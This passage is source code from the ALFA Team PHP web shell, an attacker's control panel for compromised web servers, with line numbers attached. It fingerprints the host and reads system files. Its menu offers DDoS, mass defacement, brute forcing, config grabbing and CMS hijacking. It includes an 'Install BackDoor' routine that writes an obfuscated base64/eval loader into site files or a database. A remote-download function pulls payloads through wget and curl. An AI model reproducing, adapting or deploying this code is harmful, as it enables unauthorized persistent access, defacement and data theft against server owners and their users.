2095<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
2096</tr>
2097<tr>
2098<td width="3%"><span class="header_vars">DateTime:</span></td>
2099<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
2100</tr>
2101<tr>
2102<td><span class="header_vars">Domains:</span></td>
2103<td width="76%"><span class="header_values" id="header_domains">';
2104if($GLOBALS['sys']=='unix'){
2105$d0mains = _alfa_file("/etc/named.conf",false);
2106if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
2107$count=0;
2108foreach($d0mains as $d0main){
2109if(@strstr($d0main,"zone")){
2110preg_match_all('#zone "(.*)"#', $d0main, $domains);
2111flush();
2112if(strlen(trim($domains[1][0])) > 2){
2113flush();
2114$count++;}}}
2115echo "$count Domains";}}
2116else{echo("Cant Read [ /etc/named.conf ]");}
2117echo '</span></td>
2118</tr>
2119<tr>
2120<td height="16"><span class="header_vars">HDD:</span></td>
2121<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
2122</tr>';
2123if($GLOBALS['sys']=='unix'){
2124$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
2125if(!@ini_get('safe_mode')){
2126if(strlen(alfaEx("id",false,false))>0){
2127echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
2128$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
2129$x=0;
2130foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
2131if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
2132echo '</td>
2133</tr>
2134<tr>
2135<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
2136$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
2137$x=0;
2138foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
2139if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
2140echo '</td>
2141</tr>';
2142}else{
2143echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
2144}
2145}else{
2146echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
2147}
2148}else{
2149echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
2150echo alfaEx('ver',false,false);
2151echo '</td>
2152</tr> <tr>
2153<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
2154</tr></b>';
2155}
2156$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
2157echo '<tr>
2158<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
2159</tr>
2160<tr>
2161<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
2162</tr>
2163<tr>
2164<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
2165</tr>
2166<tr>
2167<td height="11"><span class="header_vars">SoftWare: </span></td>
2168<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
2169</tr>';
2170if($GLOBALS['sys']=="win"){
2171echo '<tr>
2172<td height="12"><span class="header_vars">DRIVE:</span></td>
2173<td colspan="2"><b>'.$drives.'</b></td>
2174</tr>';
2175}
2176echo '<tr>
2177<td height="12"><span class="header_vars">PWD:</span></td>
2178<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
2179</tr>
2180</table>
2181</div>
2182<div id="meunlist">
2183<ul>
2184';
2185$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
2186'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
2187'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
2188'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
2189'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
2190);
2191foreach($li as $key=>$value){
2192echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
2193}
2194if(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']))
2195echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
2196else
2197echo '</ul></div>';}else{
2198@error_reporting(E_ALL ^ E_NOTICE);
2199@ini_set('error_log',NULL);
2200@ini_set('log_errors',0);
2201@ini_set('max_execution_time',0);
2202@ini_set('magic_quotes_runtime', 0);
2203@set_time_limit(0);
2204}}
2205function alfalogout(){
2206@setcookie("AlfaUser", null, 2012);
2207@setcookie("AlfaPass", null, 2012);
2208unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
2209echo("<center><font color='red'>Logout...</font></center>");
2210}
2211function showAnimation($name){
2212 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
2213}
2214function __showicon($r){
2215 $s['btn']='http://solevisible.com/images/btn.png';
2216 $s['alfamini']='http://solevisible.com/images/alfamini.png';
2217 $s['loader']='http://solevisible.com/images/loader.svg';
2218 //return 'data:image/png;base64,'.__get_resource($s[$r]);
2219 return $s[$r];
2220}
2221function alfainbackdoor(){
2222alfahead();
2223echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
2224$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
2225$success= '<font color="green">Success...!';
2226$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
2227$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
2228$cwd = 'Example: /home/alfa/public_html/index.php';
2229if($_POST['alfa1']=='file'){
2230echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
2231if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
2232$method = $_POST['alfa2'];
2233$file = $_POST['alfa3'];
2234$shell = $_POST['alfa4'];
2235$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
2236if($key=='')$key='alfa';
2237if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2238$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
2239if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
2240if($_POST['alfa1']=='db'){
2241echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
2242$table = array('td1' =>
2243array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2244'td2' =>
2245array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2246'td3' =>
2247array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2248'td4' =>
2249array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2250'td5' =>
2251array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
2252'td6' =>
2253array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
2254);
2255create_table($table);
2256echo("<p>{$select}</p>");
2257echo($textarea);
2258echo("<p><input type='submit' value=' '></p></form></p></center>");
2259if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
2260$dbhost = $_POST['alfa2'];
2261$dbuser = $_POST['alfa3'];
2262$dbpw = $_POST['alfa4'];
2263$dbname = $_POST['alfa5'];
2264$file = $_POST['alfa6'];
2265$method = $_POST['alfa7'];
2266$shell = $_POST['alfa8'];
2267$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
2268if($key=='')$key='alfa';
2269if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2270if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
2271$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
2272if(@is_file($file)&&@is_writable($file)){
2273@mysqli_query($conn,'DROP TABLE `alfa_bc`');
2274@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
2275@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
2276@file_put_contents($file,$code."\n".@file_get_contents($file));
2277__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
2278echo('</div>');
2279alfafooter();
2280}
2281function alfawhois(){
2282echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
2283if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
2284$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
2285$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
2286$data = @file_get_contents($target);
2287if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
2288$target = @json_decode($data,true);
2289echo __pre();
2290if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
2291echo("</div>");
2292}
2293function alfaremotedl(){
2294alfahead();
2295echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
2296<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
2297<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
2298<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
2299</form></p></center>");
2300if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
2301echo __pre();
2302$url = $_POST['alfa1'];
2303$path = $_POST['alfa2'];
2304echo('<center>');
2305if(__download($url,$path)){
2306echo('<font color="green">Success...!</font>');
2307}else{
2308echo('<font color="red">Error...!</font>');
2309}
2310echo('</center>');
2311}
2312echo("</div>");
2313alfafooter();
2314}
2315function __download($url,$path=false){
2316if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
2317$saveas = basename(rawurldecode($url));
2318if($path){$saveas=$path.$saveas;}
2319if($content = __read_file($url)){
2320if(@is_file($saveas))@unlink($saveas);
2321if(__write_file($saveas, $content)){return true;}}
2322$buff = alfaEx("wget ".$url." -O ".$saveas);
2323if(@is_file($saveas)) return true;
2324$buff = alfaEx("curl ".$url." -o ".$saveas);
2325if(@is_file($saveas)) return true;
2326$buff = alfaEx("lwp-download ".$url." ".$saveas);
2327if(@is_file($saveas)) return true;
2328$buff = alfaEx("lynx -source ".$url." > ".$saveas);
2329if(@is_file($saveas)) return true;
2330$buff = alfaEx("GET ".$url." > ".$saveas);
2331if(@is_file($saveas)) return true;
2332$buff = alfaEx("links -source ".$url." > ".$saveas);
2333if(@is_file($saveas)) return true;
2334$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
2335if(@is_file($saveas)) return true;
2336return false;
2337}
2338function clean_string($string){
2339 if(function_exists("iconv")){
2340 $s = trim($string);
2341 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
2342 }
2343 return $s;
2344}
2345function __read_file($file, $boom = true){
2346$content = false;
2347if($fh = @fopen($file, "rb")){
2348$content = "";
2349while(!feof($fh)){
2350$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
2351}
2352@fclose($fh);
2353}
2354if(empty($content)||!$content){
2355 $content = alfaEx("cat '".addslashes($file)."'");
2356}
2357return $content;
2358}
2359function alfaSettings(){
2360alfahead();
2361AlfaNum(6,7,8,9,10);
2362echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
2363if($_POST["alfa8"] == "main"){
2364echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
2365$lg_array = array('0'=>'No','1'=>'Yes');
2366$penc_array = array('false'=>'No','true'=>'Yes');
2367$protect_html = "";
2368$icon_html = "";
2369$postEnc_html = "";
2370$login_html = "";
2371$cgiapi_html = "";
2372foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
2373foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
2374foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
2375foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
2376$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
2377foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
2378echo '';
2379echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
2380if($_POST['alfa5']=='>>'){
2381echo __pre();
2382if(!empty($_POST['alfa3'])){
2383$protect = $_POST['alfa1'];
2384$lgpage = $_POST['alfa2'];
2385$username = $_POST['alfa3'];
2386$password = md5($_POST['alfa4']);
2387$icon = $_POST['alfa6'];
2388$post_encrypt = $_POST['alfa7'];
2389$cgi_api_val = $_POST['alfa9'];
2390@chdir($GLOBALS['home_cwd']);
2391$basename = @basename($_SERVER['PHP_SELF']);
2392$data = @file_get_contents($basename);
2393$user_rand = $GLOBALS["DB_NAME"]["user_rand"];
2394$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
2395$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
2396$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
2397$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
2398$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
2399$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
2400$find_user = '/\''.$user_rand.'\'(.*?),/i';
2401$find_pw = '/\''.$pass_rand.'\'(.*?),/i';
2402$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
2403$find_p = '/\''.$safemode_rand.'\'(.*?),/i';
2404$icons = '/\''.$show_icons_rand.'\'(.*?),/i';
2405$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
2406$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
2407if(!empty($username)&&preg_match($find_user,$data,$e)){
2408$new = '\''.$user_rand.'\' => \''.$username.'\',';
2409$data = str_replace($e[0],$new,$data);
2410}
2411if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
2412$new = '\''.$pass_rand.'\' => \''.$password.'\',';
2413$data = str_replace($e[0],$new,$data);
2414}
2415if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
2416$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
2417$data = str_replace($e[0],$new,$data);
2418}
2419if(!empty($find_p)&&preg_match($find_p,$data,$e)){
2420$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
2421$data = str_replace($e[0],$new,$data);
2422}
2423if(preg_match($icons,$data,$e)){
2424$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
2425$data = str_replace($e[0],$new,$data);
2426}
2427if(preg_match($postEnc,$data,$e)){
2428$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
2429$data = str_replace($e[0],$new,$data);
2430}
2431if(preg_match($cgi_api_reg,$data,$e)){
2432$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
2433$data = str_replace($e[0],$new,$data);
2434}
2435if(@file_put_contents($basename,$data)){
2436echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
2437}else{
2438__alert("<span style='color:red;'>File has no edit access...!</span>");
2439}
2440}else{
2441__alert("<span style='color:red;'>UserName is Empty !</span>");
2442}
2443}
2444}elseif($_POST["alfa8"] == "color"){
2445echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
2446echo '<table border="1"><tbody>';
2447$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
2448$x = 1;
2449foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
2450 $multi = "";
2451 if(is_array($value)){
2452 if(isset($value["multi_selector"])){
2453 $multi = __ZW5jb2Rlcg(json_encode($value));
2454 }
2455 }
2456 $value = alfa_getColor($key);
2457 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
2458 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
2459}
2460echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
2461
2462echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
2463if($_POST['alfa7']=='export'){
2464 echo __pre();
2465 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
2466 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2467 $array = array();
2468 foreach($glob_colors as $k => $v){
2469 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2470 $v = trim($colors[$k]);
2471 }else{
2472 $v = trim(is_array($v)?$v["key_color"]:$v);
2473 }
2474 $array[$k] = $v;
2475 }
2476 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
2477 $config = json_encode($array, JSON_PRETTY_PRINT);
2478 if(!@file_put_contents($file, $config)){
2479 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
2480 }else{
2481 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
2482 }
2483}
2484if($_POST['alfa2']=='>>'){
2485 echo __pre();
2486 $colors = json_decode($_POST["alfa1"],true);
2487 $array = "";
2488 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
2489 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2490 foreach($glob_colors as $k => $v){
2491 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2492 $v = trim($colors[$k]);
2493 }else{
2494 $v = trim(is_array($v)?$v["key_color"]:$v);
2495 }
2496 $array .= '"'.trim($k).'" => "'.$v.'",';
2497 }
2498 @chdir($GLOBALS['home_cwd']);
2499 $basename = @basename($_SERVER['PHP_SELF']);
2500 $data = @file_get_contents($basename);
2501 $color = '/\'color\'(.*?)\),/s';
2502 if(preg_match($color,$data,$e)){
2503 $new = "'color' => array(".$array."),";
2504 $data = str_replace($e[0],$new,$data);
2505 if(@file_put_contents($basename, $data)){
2506 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
2507 }else{
2508 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
2509 }
2510 }else{
2511 echo("<center><p><h3>[-] Error...!</h3></p></center>");
2512 }
2513}
2514}
2515echo('</div>');
2516alfafooter();
2517}
2518function alfaplus(){
2519alfahead();
2520echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
2521if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
2522try{
2523$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
2524$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
2525$news = new AlfaCURL();
2526if($news->Send($s1)){
2527$xml = $news->Send($s1);
2528}else{
2529$xml = false;
2530}
2531if($xml){
2532if(@simplexml_load_string($xml)){
2533$doc = new DOMDocument;
2534$doc->loadXML($xml);
2535$data = @$doc->getElementsByTagName('data')->item(0);
2536$items = @$data->getElementsByTagName('item');
2537foreach($items as $item){
2538$title = @$item->getElementsByTagName('title')->item(0)->nodeValue;
2539$description = @$item->getElementsByTagName('description')->item(0)->nodeValue;
2540$link = @$item->getElementsByTagName('link')->item(0)->nodeValue;
2541$pubDate = @$item->getElementsByTagName('pubDate')->item(0)->nodeValue;
2542echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
2543}
2544}else{
2545echo($msg);
2546}
2547}else{
2548echo($msg);
2549}
2550}catch(Exception $e){
2551echo $e->getMessage();
2552}}elseif($_POST['alfa1']=='about'){
2553echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
2554<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
2555<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
2556<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
2557<font color='#00A220'>Telegram Channel: @solevisible</font><br>
2558<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
2559<font color='#FFFFFF'>Skype : sole.sad</font><br>
2560<font color='#FF0000'>Persian Gulf For Ever</font><br>
2561<font color='#FF0000'>Iranian Programmers</font><br>
2562<font color='#FF0000'>############</font><br>
2563</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
2564}
2565echo('</div>');
2566alfafooter();
